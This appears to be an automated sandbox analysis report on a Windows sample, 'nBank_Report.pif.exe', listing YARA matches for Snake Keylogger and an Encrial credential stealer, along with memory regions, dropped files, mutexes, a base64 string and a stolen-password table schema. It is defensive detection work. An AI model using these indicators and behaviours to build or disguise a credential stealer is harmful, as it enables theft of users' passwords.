              Source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000008.00000002.3867494805.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: nBank_Report.pif.exe PID: 7792, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: nBank_Report.pif.exe PID: 7792, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: nBank_Report.pif.exe PID: 3276, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 7100, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 7100, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 5500, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 5500, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 0_2_0155DE4C0_2_0155DE4C
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0293B3288_2_0293B328
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0293C1908_2_0293C190
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_029361088_2_02936108
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0293C7528_2_0293C752
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0293C4708_2_0293C470
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_02934AD98_2_02934AD9
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0293CA328_2_0293CA32
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0293BBD28_2_0293BBD2
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_029368808_2_02936880
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_029398588_2_02939858
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0293BEB28_2_0293BEB2
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0293B4F28_2_0293B4F2
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_029335728_2_02933572
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067956608_2_06795660
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067944E08_2_067944E0
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679C2308_2_0679C230
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067931988_2_06793198
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_06797D108_2_06797D10
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679C9008_2_0679C900
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067956508_2_06795650
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067926988_2_06792698
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067944D08_2_067944D0
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067952008_2_06795200
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067951F18_2_067951F1
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067931888_2_06793188
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_06797D008_2_06797D00
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_06794DA08_2_06794DA0
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_06794D908_2_06794D90
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679B8888_2_0679B888
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679B88A8_2_0679B88A
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679F9798_2_0679F979
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067949408_2_06794940
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_067949318_2_06794931
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 8_2_0679F9888_2_0679F988
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 10_2_0135DE4C10_2_0135DE4C
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 10_2_073A42C810_2_073A42C8
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275B32813_2_0275B328
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275610813_2_02756108
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275C19013_2_0275C190
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275C75113_2_0275C751
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275673013_2_02756730
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275C47013_2_0275C470
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275CA3113_2_0275CA31
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_02754AD913_2_02754AD9
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275BBD213_2_0275BBD2
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275985813_2_02759858
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275BEB013_2_0275BEB0
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275B4F213_2_0275B4F2
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 13_2_0275357013_2_02753570
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 2540
              Source: nBank_Report.pif.exe, 00000000.00000002.1478197237.0000000004185000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exe, 00000000.00000002.1478197237.0000000004185000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exe, 00000000.00000002.1482170797.0000000008020000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exe, 00000000.00000002.1478197237.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exe, 00000000.00000000.1405120453.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefLpg.exeD vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exe, 00000000.00000002.1478197237.00000000049B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exe, 00000000.00000002.1481318522.00000000070E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefLpg.exeD vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exe, 00000000.00000002.1478197237.0000000004152000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exe, 00000000.00000002.1475032638.000000000113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exe, 00000008.00000002.3865132615.00000000009A7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exeBinary or memory string: OriginalFilenamefLpg.exeD vs nBank_Report.pif.exe
              Source: nBank_Report.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: sslproxydump.pcap, type: PCAPMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.3867494805.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: nBank_Report.pif.exe PID: 7792, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: nBank_Report.pif.exe PID: 7792, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: nBank_Report.pif.exe PID: 3276, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 7100, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 7100, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 5500, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 5500, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: nBank_Report.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: VtPPJdSqnkbmja.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, tk---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, tk---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, tW-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, tW-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, tk---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, tk---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, tW-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, tW-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, tW-.csBase64 encoded string: 'JZjeKQ89YI0EQ4ZbR10cwTL+tPJHAhwcQ9TkTJoc5rixfU6GoXtjWWE3l6n1BNrR'
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, tW-.csBase64 encoded string: 'JZjeKQ89YI0EQ4ZbR10cwTL+tPJHAhwcQ9TkTJoc5rixfU6GoXtjWWE3l6n1BNrR'
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, DK7hrTkkoyOZXoRcfs.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, DK7hrTkkoyOZXoRcfs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, DK7hrTkkoyOZXoRcfs.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.nBank_Report.pif.exe.3f38478.2.raw.unpack, uZt8drGU9Q6E8i6tV6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/18@4/3
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeFile created: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMutant created: NULL
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMutant created: \Sessions\1\BaseNamedObjects\BzfJdzIrZxyC
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5500
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeFile created: C:\Users\user\AppData\Local\Temp\tmp6F97.tmpJump to behavior
              Source: nBank_Report.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: nBank_Report.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: nBank_Report.pif.exe, 00000008.00000002.3871996905.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: nBank_Report.pif.exeReversingLabs: Detection: 42%
